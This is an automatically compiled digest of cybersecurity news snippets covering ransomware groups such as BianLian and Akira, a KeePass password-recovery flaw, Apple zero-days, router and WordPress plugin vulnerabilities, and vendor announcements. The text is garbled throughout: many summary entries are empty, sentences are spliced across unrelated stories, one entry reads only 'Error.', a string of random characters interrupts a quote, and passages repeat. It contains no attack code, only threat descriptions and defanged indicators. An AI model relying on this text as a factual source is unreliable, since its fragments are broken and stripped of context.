Luxottica is the world’s largest eyewear company, glasses, and prescription frames maker, and the owner of popular brands like Ray-Ban, Oakley, Chanel, Prada, Versace, Dolce and Gabbana, Burberry, Giorgio Armani, Michael Kors, and many other. "Autosummary:
"NTT and Cisco have announced a collaboration to develop and deploy joint solutions that empower organizations to improve operational efficiencies and advance sustainability goals. Leveraging NTT’s Edge as a Service portfolio and Cisco’s IoT capabilities, solutions developed by the two companies will offer real-time data insights, enhanced security, improved decision-making, and reduced operational costs through predictive maintenance, asset tracking, and supply chain management capabilities. The companies will deliver solutions that combine NTT’s Managed Services expertise, … More
The post NTT and Cisco help customers transition to IoT-as-a-Service model appeared first on Help Net Security.
"Autosummary:
Leveraging NTT’s Edge as a Service portfolio and Cisco’s IoT capabilities, solutions developed by the two companies will offer real-time data insights, enhanced security, improved decision-making, and reduced operational costs through predictive maintenance, asset tracking, and supply chain management capabilities. "Strata Identity has unveiled the latest version of the Maverics platform that enables customers to unify ID Orchestration functions between legacy on-premises, modern cloud, and multi-vendor environments without rewriting their applications. With Maverics, businesses easily create a vendor-agnostic identity fabric through a visual management interface that supports any identity provider (IDP), including legacy on-premises systems and cloud systems from AWS, Azure, Okta and GCP. According to a Gartner report: “Orchestration through access management can be … More
The post Strata Identity unifies Maverics ID Orchestration functions across environments appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
We also learned about new attacks and significant developments in previous ones: Finally, researchers and law enforcement released new reports: Contributors and those who provided new ransomware information and stories this week include: @serghei, @LawrenceAbrams, @PolarToffee, @malwrhunterteam, @DanielGallagher, @Ionut_Ilascu, @demonslay335, @billtoulas, @Seifreed, @BleepinComputer, @fwosar, @VK_Intel, @struppigel, @BrettCallow, @TalosSecurity, @CrowdStrike, @pcrisk, @GroupIB, @zscaler, @MsftSecIntel, and @juanbrodersen. Over the past few weeks, we have reported on new ransomware operations that have emerged in enterprise attacks, including the new Cactus, Akira, RA Group operations. "Autosummary:
Medium-severity vulnerabilities will pay between $10,000 and $25,000 Low-severity issues have the still notable payout range of $1,000 to $10,000 For Group 2, which concerns all other blockchains supported by LayerZero, the maximum payout is $1,500,000 for critical findings, $25,000 for high-severity, $10,000 for medium, and $5,000 for low-impact flaws. "Autosummary:
iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), iPod touch (7th generation), and iPhone 8 and later iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later Macs running macOS "Autosummary:
By monitoring the operation, the analysts detected over 490,000 mobile numbers used for generating one-time password requests for SMS PVA services from JingDong, WhatsApp, Facebook, QQ, Line, Tinder, and other platforms. These functions allow the Lemon Group to establish a diverse monetization strategy that could include selling compromised accounts, hijacking network resources, offering app-installation services, generating fraudulent ad impressions, offering proxy services, and SMS Phone Verified Accounts (PVA) services. "Autosummary:
A new KeePass vulnerability tracked as CVE-2023-3278 makes it possible to recover the KeePass master password, apart from the first one or two characters, in cleartext form, regardless of whether the KeePass workspace is locked, or possibly, even if the program is closed. In our tests, you can use Process Explorer to dump the memory of the KeePass project, but it requires a full memory dump, and not a minidump, to work correctly. "Categories: Exploits and vulnerabilities Categories: News Categories: Personal Tags: KeePass Tags: memory dump Tags: CVE-2023-32784 There is a Proof-of-Concept available for an unpatched vulnerability in KeePass that allows attackers to dump the master password. |
The post KeePass vulnerability allows attackers to access the master password appeared first on Malwarebytes Labs.
"Autosummary:
For those with the more serious threat model of system confiscation that we mentioned earlier, the researcher that found the issue posted the advice to follow these steps: Change your master password Delete hibernation file Delete pagefile/swapfile Overwrite deleted data on the HDD to prevent carving (e.g. Cipher with /w on Windows) Restart your computer Or just overwrite your hard disk drive (HDD) and do a fresh install of your operating system (OS). "Autosummary:
According to Security Scorecard, 48%, nearly half, of the manufacturing companies reviewed scored a C, D, or F in security.In fact, in 2022 alone, there were 2,337 security breaches of manufacturing systems, 338 with confirmed data disclosure (Verizon, 2022 DBIR Report).With minimal set up, requiring no agents or pre-installations, security and IT teams at manufacturing companies can safely challenge their complete attack surface to pinpoint the most damaging security gaps - just like a real-life attacker would. 5 — Benchmark Your Security Posture By continuously testing your attack surface at regular, frequent intervals, you can continuously benchmark your security posture. "Autosummary:
The intermediate DLL file, for its part, is configured to download a cryptocurrency miner from one of the three C2 servers – 179.43.155[.]202, work.letmaker[.]top, and su-94.letmaker[.]top – using TCP ports 9090, 9091, or 9092. "Autosummary:
Mihalo and his associates also peddled their warez on other dark web marketplaces such as AlphaBay Market, Wall Street Market, and Hansa Market between February 22, 2016, and October 1, 2019. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Apple released security updates to address three zero-day vulnerabilities in iPhones, Macs, and iPads that are actively exploited in attacks. Apple has addressed three new zero-day vulnerabilities that are actively exploited in attacks in the wild to hack into iPhones, Macs, and iPads. The three vulnerabilities, tracked as CVE-2023-32409, CVE-2023-28204, and CVE-2023-32373, reside in the […]
The post Apple fixed three new actively exploited zero-day vulnerabilities appeared first on Security Affairs.
"Autosummary:
Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Apple) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On In February, the company released emergency security updates to address an actively exploited zero-day vulnerability, tracked as CVE-2023-23529, that impacts iOS, iPadOS, and macOS. "Autosummary:
"Autosummary:
A joint Cybersecurity Advisory from government agencies in the U.S. and Australia, and published by the Cybersecurity and Infrastructure Security Agency (CISA,) is warning organizations of the latest tactics, techniques, and procedures (TTPs) used by the BianLian ransomware group. "Autosummary:
"Autosummary:
Some of the conflicting game anti-cheat drivers causing Windows crashes or conflicts when Kernel-mode HSP is enabled include PUBG, Valorant (Riot Vanguard), Bloodhunt, Destiny 2, Genshin Impact, Phantasy Star Online 2 (Game Guard), and Dayz. One week later, on April 26, Redmond announced they fixed the LSA Protection UI issue, however, this was just done by removing the setting in the KB5007651 Defender update to ensure that the confusing alerts would no longer be displayed in the Windows Settings app. "Autosummary:
While the ransom notes do not contain a link to the ransomware gang’s data leak site, Emsisoft threat analyst Brett Callow found a link to their data leak site, having the title, "Somos malas... podemos ser peores," translated to, "We are bad... we can be worse.{0DS )2D"y,c BA l/tjxov1fa12V8Imj8SfQ27INLwEg+AC2lX3ou4N8HAjtmu9cPV6xLQ --- 7bAeZFny0Xk7gqxscyeDGDbHjsCvAZ0aETUUhIsXnyg The Age encryption tool was developed by Filippo Valsorda, cryptographer and Go security lead at Google, and uses the X25519 (an ECDH curve), ChaChar20-Poly1305, and HMAC-SHA256 algorithms. "Categories: News Tags: ransomware Tags: RA Group Tags: babuk Tags: code Tags: leaked Tags: encrypted Tags: stolen Tags: exfiltrated Tags: ransom Tags: hijack Tags: blackmail Tags: double extortion Tags: leak Tags: sell We take a look at yet another ransomware group making use of leaked Babuk code. |
The post Leaked Babuk ransomware builder code lives on as RA Group appeared first on Malwarebytes Labs.
"Autosummary:
If you’re unfortunate enough to end up on the leak portal, your details are organised like so: Organisation name A list of stolen data / file size Organisation URL Customised ransom notes are used for compromised entities, with three days given to pay up or risk the data being made public. Should your data eventually end up for sale, the below message may eventually provide lots of sleepless nights: If you want to buy this data, please contact us by qtox qTox is an instant messaging tool billed as being secure and private, particularly with regard to avoiding having your Government listening in on what you might be saying.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Episode links: Sponsored by: Bitwarden – Password security you can trust. "Autosummary:
"Autosummary:
The most frequently attacked nations include Pakistan, China, Sri Lanka, Afghanistan, Bangladesh, Myanmar, the Philippines, Qatar, and Singapore. "Autosummary:
Mikhail Pavlovich Matveev (aka Wazawaka, m1x, Boriselcin, and Uhodiransomwar), the 30-year-old individual in question, is alleged to be a "central figure" in the development and deployment of LockBit, Babuk, and Hive ransomware variants since at least June 2020. "Searchlight Cyber researchers warn of threat actors that are offering on the dark web access to energy sector organizations. Dark web intelligence firm Searchlight Cyber published a report that analyzes how threat actors in the dark web prepare their malicious operations against energy organizations. The threat actors use the hidden part of the web to […]
The post Monitoring the dark web to identify threats to energy sector organizations appeared first on Security Affairs.
"Autosummary:
Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, dark web) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On Threat actors auction initial access to remote software, RDP access, VPNs, and stolen credentials, allowing attacks to use these accesses to establish a foothold in the target organization and launch the attack on both IT and OT infrastructure. "The US government is offering a $10M reward for Russian national Mikhail Pavlovich Matveev (30) charged for his role in ransomware attacks The US Justice Department charged Russian national Mikhail Pavlovich Matveev (30), aka Wazawaka, m1x, Boriselcin, and Uhodiransomwar, for his alleged role in multiple ransomware attacks. The DoJ unsealed two indictments charging the man […]
The post US Gov offers a $10M reward for a Russian ransomware actor appeared first on Security Affairs.
"Autosummary:
“From Russia and hiding behind multiple aliases, Matveev is alleged to have used these ransomware strains to encrypt and hold hostage for ransom the data of numerous victims, including hospitals, schools, nonprofits, and law enforcement agencies, like the Metropolitan Police Department in Washington, D.C.,” said U.S. Attorney Philip R. Sellinger for the District of New Jersey. "Experts found multiple vulnerabilities in Teltonika industrial cellular routers that could expose OT networks to cyber attacks. A joint analysis conducted by industrial cybersecurity firms Claroty and Otorio discovered multiple flaws in Teltonika Networks’ IIoT products that can expose OT networks to remote attacks. Teltonika Networks is a leading manufacturer of networking solutions, widely adopted […]
The post Multiple flaws in Teltonika industrial cellular router expose OT networks to hack appeared first on Security Affairs.
"Autosummary:
Remote Management System (RMS): Versions prior to 4.14.0 (affected by CVE-2023-2586) RUT model routers: Version 00.07.00 through 00.07.03.4 (affected by CVE-2023-32349) RUT model routers: Version 00.07.00 through 00.07.03 (affected by CVE-2023-32350) “While hundreds of thousands of Teltonika devices are deployed worldwide, a search on internet-scanning engines such as Shodan and Censys also reveals thousands of internet-facing devices, with their management ports externally exposed to the internet.” concludes Otorio. "Autosummary:
"Autosummary:
"Autosummary:
Error. "Autosummary:
domains that are associated with common ZIP archives, such as update.zip, financialstatement.zip, setup.zip, attachment.zip, officeupdate.zip, and backup.zip, to display information about the risks of ZIP domains, to RickRoll you, or to share harmless information. The new domains are .dad, .esq, .prof, .phd, .nexus, .foo, and for the topic of our article, the .zip and .mov domain TLDs. However, these domains could be perceived as risky as the TLDs are also extensions of files commonly shared in forum posts, messages, and online discussions, which will now be automatically converted into URLs by some online platforms or applications. "Autosummary:
domains that are associated with common ZIP archives, such as update.zip, financialstatement.zip, setup.zip, attachment.zip, officeupdate.zip, and backup.zip, to display information about the risks of ZIP domains, to RickRoll you, or to share harmless information. The new domains are .dad, .esq, .prof, .phd, .nexus, .foo, and for the topic of our article, the .zip and .mov domain TLDs. However, these domains could be perceived as risky as the TLDs are also extensions of files commonly shared in forum posts, messages, and online discussions, which will now be automatically converted into URLs by some online platforms or applications. "Autosummary:
"Autosummary:
" The Israeli cybersecurity firm is tracking the threat group under the mythical creature name Camaro Dragon, which is also known as BASIN, Bronze President, Earth Preta, HoneyMyte, RedDelta, and Red Lich. "Autosummary:
"Autosummary:
It achieves this by "starting a rundll32 process and injecting a simple program with a browser window (written in Visual Basic) in it," which loads a phishing page urging victims to scan a QR code in order to verify their identity and enter a confirmation code to "restore your device"s network. "The credential verification and confirmation code are two useful features that make this phishing kit more successful, as the victim cannot simply close the window or enter fake information just to get rid of the window," the researchers said. "Why do people still download files from sketchy places and get compromised as a result?
The post You may not care where you download software from, but malware does appeared first on WeLiveSecurity
"Autosummary:
It steals credentials from many programs including Discord, FileZilla, Steam, Telegram, various VPN clients such as OpenVPN and ProtonVPN), as well as cookies and credentials from web browsers such as Google Chrome, Mozilla Firefox, and their derivatives.Bruce P. Burrell, Alexandre Côté Cyr, Nick FitzGerald, Tomáš Foltýn, Lukáš Štefanko, and Righard Zwienenberg for their assistance with this article, as well as Neowin for publishing the original version of it. Safe(r) downloads When security practitioners talk about downloading files only from reputable websites, it seems that we are often only doing half of the job of educating the public about them, or maybe even a little less, for that matter: we’ve done a far better job of telling people what kind of sites to go to (reputable ones, obviously) without explaining what makes a site safe to download from in the first place.Yes, it could be a site with the same domain name as the publisher’s site, but it could also be that the files are located on GitHub, SourceForge, hosted on a content delivery network (CDN) operated by a third party, and so forth.While the goal of any search engine—whether it is Bing, DuckDuckGo, Google, Yahoo, or another— is to provide the best and most accurate results, their core businesses often revolve around advertising.It also collects some information about the environment where it is running, such as display size, the processor, RAM, video card, and a list of programs and processes on the computer.One might assume these sites to be reputable download sites, and for the most part they are exactly that, but there is no 100% guarantee: Unscrupulous software authors have circumvented app stores’ vetting processes to distribute software that invade people’s privacy with spyware, display egregious advertisements with adware, and engage in other unwanted behaviors.And from the information security practitioner’s side, where exactly is the disconnect occurring between what we’re telling people to do (or not do, as the case may be), and what they are doing (or, again, not doing)? "French electronics manufacturer Lacroix Group shut down three plants after a cyber attack, experts believe it was the victim of a ransomware attack. The French electronics manufacturer Lacroix Group shut down three facilities in France, Germany, and Tunisia in response to a cyber attack. The group designs and manufactures electronic equipment for its customers in […]
The post Lacroix Group shut down three facilities after a ‘targeted cyberattack’ appeared first on Security Affairs.
"Autosummary:
Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
In addition to the ransomware groups cited in the Sentinel Labs report as users of Babuk, Cisco Talos also mentions Rook, Night Sky, Pandora, Nokoyawa, Cheerscrypt, AstraLocker 2.0, and ESXiArgs. "Autosummary:
"Autosummary:
The rootkit"s loader, "FormDII.dll," exports functions that can be used to drop payloads that match the host"s system architecture, read and execute shellcode from a file, kill processes, and more. "Autosummary:
News Corporation, a mass media and publishing giant that owns New York Post, The Wall Street Journal, Dow Jones, MarketWatch, Fox News, Barron"s, The Sun, and the News UK, also disclosed in February 2023 that Chinese-linked attackers had access to its network between February 2020 and January 2022. "Autosummary:
The emerging info-stealers Although older strains like RedLine, Raccoon, and Vidar continue to have a significant presence, and newer families like Aurora, Mars, and Meta are still growing, new malware families are also trying to make a name for themselves this year. "Categories: Exploits and vulnerabilities Categories: News Tags: Ruckus Tags: CISA Tags: AndoryuBot Tags: CVE-2023-25717 Tags: 163.123.142.146 CISA has added a Ruckus vulnerability being abused by the AndoryuBot botnet to its catalog. |
The post Update now! Ruckus vulnerability added to CISA’s list of actively exploited bugs appeared first on Malwarebytes Labs.
"Autosummary:
Protection To protect your devices against the AndoryuBot botnet which seems to thrive on this vulnerability, you should install the available patches and replace the legacy devices that have reached EoL. Other measures to protect your devices from falling prey to botnets are: Use strong passwords and multi-factor authentication where possible. "Categories: News Categories: Ransomware Tags: ransomware Tags: data breach Tags: dark web Tags: share information Paying the ransom and not saying a word about what happened is what cybercriminals would like us all to do. |
The post Why we should be more open about ransomware attacks appeared first on Malwarebytes Labs.
"Autosummary:
Depending on the country an organization is based in, whether they handle data under GDPR regulations, whether they are a government contractor, what sector they are active in, or whatever other reasons, some organizations have a legal obligation to notify one or more authorities about a cyberattack.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. The UK’s National Cyber Security Centre (NCSC) has published an article that reflects on why it’s so concerning when cyberattacks go unreported, saying: ...we are increasingly concerned about what happens behind the scenes of the attacks we don’t hear about, particularly the ransomware ones. "Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Cyber Security Centre (ACSC) are releasing this joint Cybersecurity Advisory to disseminate known BianLian ransomware and data extortion group IOCs and TTPs identified through FBI and ACSC investigations as of March 2023.
|
Actions to take today to mitigate cyber threats from BianLian ransomware and data extortion: |
BianLian is a ransomware developer, deployer, and data extortion cybercriminal group that has targeted organizations in multiple U.S. critical infrastructure sectors since June 2022. They have also targeted Australian critical infrastructure sectors in addition to professional services and property development. The group gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian group actors then extort money by threatening to release data if payment is n "
Autosummary:
In addition, FBI, CISA, and ACSC recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors: Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or ACSC. RESOURCES Reporting The FBI is seeking any information that can be shared, including boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with BianLian actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.According to the ransom note, BianLian group specifically looked for, encrypted, and exfiltrated financial, client, business, technical, and personal files.The group gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud). Validate Security Controls In addition to applying mitigations, FBI, CISA, and ACSC recommend exercising, testing, and validating your organization"s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory.[T1587.001] and install remote management and access software—e.g., TeamViewer, Atera Agent, SplashTop, AnyDesk—for persistence and command and control [T1105],[T1219]. with password logins (e.g., service account, admin accounts, and domain admin accounts) with National Institute for Standards and Technology (NIST) standards for developing and managing password policies. Defense Evasion BianLian group actors use PowerShell [T1059.001] and Windows Command Shell [T1059.003] to disable antivirus tools [T1562.001 ] , specifically Windows defender and Anti-Malware Scan Interface (AMSI). The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Cyber Security Centre (ACSC) are releasing this joint Cybersecurity Advisory to disseminate known BianLian ransomware and data extortion group IOCs and TTPs identified through FBI and ACSC investigations as of March 2023.Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute for Standards and Technology (NIST) standards for developing and managing password policies. SoftPerfect Network Scanner (netscan.exe), a network scanner that can ping computers, scan ports, and discover shared folders [T1135 ] .BianLian group originally employed a double-extortion model in which they exfiltrated financial, client, business, technical, and personal files for leverage and encrypted victims’ systems. FBI, CISA, and ACSC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.Tune your security program, including people, processes, and technologies, based on the data generated by this process. Collection FBI observed BianLian group actors using malware (system.exe) that enumerates registry [T1012] and files [T1083] and copies clipboard data from users [T1115].FBI also observed BianLian harvest credentials from the Local Security Authority Subsystem Service (LSASS) memory [T1003.001], download RDP Recognizer (a tool that could be used to brute force RDP passwords or check for RDP vulnerabilities) to the victim system, and attempt to access an Active Directory domain database (NTDS.dit)Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 4.C]. Initial Access BianLian group actors gain initial access to networks by leveraging compromised Remote Desktop Protocol (RDP) credentials likely acquired from initial access brokers [T1078],[T1133] or via phishing [T1566].[T1112] to disable tamper protection for Sophos SAVEnabled, SEDEenabled, and SAVService services, which enables them to uninstall these services.Lists information about the current user account from the domain, such as the user"s name, description, and group memberships. "Autosummary:
" The six flaws impacting Teltonika Networks RMS – CVE-2023-32346, CVE-2023-32347, CVE-2023-32348, CVE-2023-2586, CVE-2023-2587, and CVE-2023-2588 – were discovered following a "comprehensive research" carried out in collaboration with Claroty. "Autosummary:
"To date, the group has compromised three organizations in the U.S. and one in South Korea across several business verticals, including manufacturing, wealth management, insurance providers and pharmaceuticals," security researcher Chetan Raghuprasad said in a report shared with The Hacker News. "Autosummary:
Other notable e-crime outfits that have updated their arsenal to target ESXi consist of ALPHV (BlackCat), Black Basta, Defray, ESXiArgs, LockBit, Nevada, Play, Rook, and Rorschach. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
" Campaigns involving Greatness have mainly manufacturing, health care, and technology entities located in the U.S., the U.K., Australia, South Africa, and Canada, with a spike in activity detected in December 2022 and March 2023. "Autosummary:
"Autosummary:
"Autosummary:
"In early May 2023, according to FBI information, the Bl00dy Ransomware Gang gained access to victim networks across the Education Facilities Subsector where PaperCut servers vulnerable to CVE-2023-27350 were exposed to the internet," reads the security advisory "Ultimately, some of these operations led to data exfiltration and encryption of victim systems. "Autosummary:
Finally, researchers and law enforcement released new reports: Contributors and those who provided new ransomware information and stories this week include: @PolarToffee, @malwrhunterteam, @Ionut_Ilascu, @demonslay335, @struppigel, @malwareforme, @BleepinComputer, @billtoulas, @FourOctets, @serghei, @VK_Intel, @fwosar, @LawrenceAbrams, @Seifreed, @jorntvdw, @DanielGallagher, @LabsSentinel, @BrettCallow, @matrosov, @binarly_io, @Checkmarx, @KrollWire, @yinzlovecyber, and @pcrisk. May 7th 2023 The new Akira ransomware operation has slowly been building a list of victims as they breach corporate networks worldwide, encrypt files, and then demand million-dollar ransoms. "Categories: News Categories: Personal Tags: forex Tags: BBC Tags: fake Tags: trading Tags: digital Tags: reviews Tags: website Tags: AI Tags: app Tags: phone Tags: twitter Tags: sponsored Tags: ad Tags: advert Tags: blue check Tags: verified We take a look at a daisy chain of links and clicks leading from a sponsored Twitter ad to a fake BBC website offering up an AI trading app. |
The post Sponsored Twitter post uses fake BBC News site to boost slippery oil trading app appeared first on Malwarebytes Labs.
"Autosummary:
The Tweet reads as follows: “Check out what benefits you can get if you are British” The Community Notes added to this tweet state: The link, via many redirects, goes to a fake BBC news page promoting an "automated trading platform" scam.If you click it, the site displays the following message: Dear client, In order to deposit funds to your trading account, your account manager will contact you via the phone in the following minutes, please be available to take the call.Plus, we also have the below almost identical review from another user: I have been using [the site] for several years now, and I have never had any issues with withdrawals or deposits. Clicking the link while using a VPN or the TOR browser, which places you outside the UK, results in an “advertorial” for an article promoting a UK-based immigration advice firm. Here’s a particularly odd review, considering the site is just a few months old: “I have been with them for several years now and have never experienced any issues. "Autosummary:
"Autosummary:
"The attack campaign has been leveraging rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload to infect its victims," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a new analysis shared with The Hacker News. "Autosummary:
"Autosummary:
"Autosummary:
Essential Addons for Elementor Plugin Flaw Actively Exploited Wordfence, in its own advisory, said the critical vulnerability in the Essential Addons for Elementor plugin is being actively exploited in the wild, and that it blocked 200 attacks targeting the flaw in the past 24 hours, making it imperative that users move quickly to update to the latest version. "Autosummary:
"Autosummary:
The attacker must also provide the correct nonce value on the "eael-resetpassword-nonce" to validate the password reset request and set a new password on the "eael-pass1" and "eael-pass2" parameters. "Autosummary:
Exploited by Russian state hackers for data theft As Microsoft revealed in a private threat analytics report, it was exploited by Russian APT28 state hackers (aka STRONTIUM, Sednit, Sofacy, or Fancy Bear) in attacks against at least 14 government, military, energy, and transportation organizations between mid-April and December 2022. "Autosummary:
Looking for the magic byte sequence (Deep Instinct) At this stage, BPFDoor attaches a Berkley Packet Filter to the socket to read only UDP, TCP, and SCTP traffic through ports 22 (ssh), 80 (HTTP), and 443 (HTTPS). "Autosummary:
"ABB operates more than 40 U.S.-based engineering, manufacturing, research and service facilities with a proven track record serving a diversity of federal agencies including the Department of Defense, such as U.S. Army Corps of Engineers, and Federal Civilian agencies such as the Departments of Interior, Transportation, Energy, United States Coast Guard, as well as the U.S. Postal Service," reads the ABB web site. "Autosummary:
"Categories: Business We blocked 100% of malware for the sixth consecutive quarter in a row. |
The post Malwarebytes achieves perfect score in latest AVLab assessment appeared first on Malwarebytes Labs.
"Autosummary:
In addition, our web protection technologies, MWAC and BrowserGuard, blocked 89% of all threats, surpassing the average web protection blocking rate of 72% across all tested products. "In it"s May update, Microsoft addressed 51 vulnerabilities in Windows, Microsoft Office, and Visual Studio. And with three zero-day flaws to urgently address in Windows (CVE-2023-24932, CVE-2023-29325 and CVE-2023-29336), the focus this month needs to be on rapidly updating both Windows and Microsoft Office. Both platforms get our “Patch Now” recommendation.
Autosummary:
Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange Server; Microsoft Development platforms (ASP.NET Core, .NET Windows This month, Microsoft released five critical updates and 22 patches rated important to the Windows platform; they cover the following key components: Windows LDAP - Lightweight Directory Access Protocol. Microsoft development platforms Microsoft released just two updates this month (CVE-2023-29338 and CVE-2023-29343), both rated important.For those still using the older code base (IE), the retired out-of-support Internet Explorer 11 desktop application was permanently turned off as part of the February Windows security update ("B" release). Testing guidance Each month, the team at Readiness analyzes the latest Patch Tuesday updates and provides detailed, actionable testing guidance. "Autosummary:
According to a report by Bleeping Computer, files with the following extensions are encrypted in the attack: .abcddb, .abs, .abx, .accdb, .accdc, .accde, .accdr, .accdt, .accdw, .accft, .adb, .ade, .adf, .adn, .adp, .alf, .arc, .ask, .avdx, .avhd, .bdf, .bin, .btr, .cat, .cdb, .ckp, .cma, .cpd, .dacpac, .dad, .dadiagrams, .daschema, .db-shm, .db-wal, .dbc, .dbf, .dbs, .dbt, .dbv, .dbx, .dcb, .dct, .dcx, .ddl, .dlis, .dqy, .dsk, .dsn, .dtsx, .dxl, .eco, .ecx, .edb, .epim, .exb, .fcd, .fdb, .fic, .fmp, .fmp12, .fmpsl, .fol, .fpt, .frm, .gdb, .grdb, .gwi, .hdb, .his, .hjt, .icg, .icr, .idb, .ihx, .iso, .itdb, .itw, .jet, .jtx, .kdb, .kdb, .kexi, .kexic, .kexis, .lgc, .lut, .lwx, .maf, .maq, .mar, .mas, .mav, .maw, .mdb, .mdf, .mdn, .mdt, .mpd, .mrg, .mud, .mwb, .myd, .ndf, .nnt, .nrmlib, .nsf, .nvram, .nwdb, .nyf, .odb, .oqy, .ora, .orx, .owc, .pan, .pdb, .pdm, .pnz, .pvm, .qcow2, .qry, .qvd, .raw, .rbf, .rctd, .rod, .rodx, .rpd, .rsd, .sas7bdat, .sbf, .scx, .sdb, .sdc, .sdf, .sis, .spq, .sql, .sqlite, .sqlite3, .sqlitedb, .subvol, .temx, .tmd, .tps, .trc, .trm, .udb, .udl, .usr, .vdi, .vhd, .vhdx, .vis, .vmcx, .vmdk, .vmem, .vmrs, .vmsd, .vmsn, .vmx, .vpd, .vsv, .vvv, .wdb, .wmdb, .wrk, .xdb, .xld, .xmlff So, if my company doesn"t have a secure backup that it can restore these files from it may find itself in a sticky pickle... According to announcements Akira"s leak website on the dark web, the ransomware has already hit a variety of organisations in the finance, real estate, and manufacturing sectors as well as a children"s daycare centre.The site, which is reachable via Tor, adopts an old-school green-on-black theme, with visitors invited to type in commands rather than navigate through a menu.We will study in depth your finance, bank & income statements, your savings, investments etc. and present our reasonable demand to you. "Autosummary:
" 5 Phases of Continuous Threat Exposure Management Scoping Discovery Prioritization Validation Mobilization Attack Surface Management assists in the first three phases of CTEM: scoping, discovery, and prioritization by supporting businesses through the inventory of known digital assets, continuous discovery of unknown assets, and human intelligence to prioritize severe exposures for timely remediation.With 20 years of experience, their cybersecurity experts secure prominent organizations worldwide, including top banks, cloud providers, healthcare companies, and Fortune 500 firms. "Autosummary:
Since bursting on the scene in September 2022, Royal ransomware has claimed responsibility for targeting 157 organizations on their leak site, with most of the attacks targeting manufacturing, retail, legal services, education, construction, and healthcare services in the U.S., Canada, and Germany. "Autosummary:
The flaw, tracked as CVE-2023-25717 (CVSS score: 9.8), stems from improper handling of HTTP requests, leading to unauthenticated remote code execution and a complete compromise of wireless Access Point (AP) equipment. "Autosummary:
During the 16 hours they had access to the employee"s account, the threat actors failed to also access multiple Dragos systems—including its messaging, IT helpdesk, financial, request for proposal (RFP), employee recognition, and marketing systems—due to role-based access control (RBAC) rules. "Autosummary:
Kingston"s SSD firmware ZIP contents (BleepingComputer) While the contents of the ZIP file hardly raise an eyebrow and contain release notes along with a working firmware (*.bin) file, it"s what"s inside the ".bin" that you can"t unsee: Lyrics of Coldplay"s 2002 song The Scientist buried in firmware (BleepingComputer) "I found Coldplay lyrics in SSD controller firmware," Starke told BleepingComputer after analyzing Kingston firmware versioned "SKC2000_S2681103. "Autosummary:
Most victims are located in the United States, with many working in manufacturing, healthcare, technology, education, real estate, construction, finance, and business services. "Autosummary:
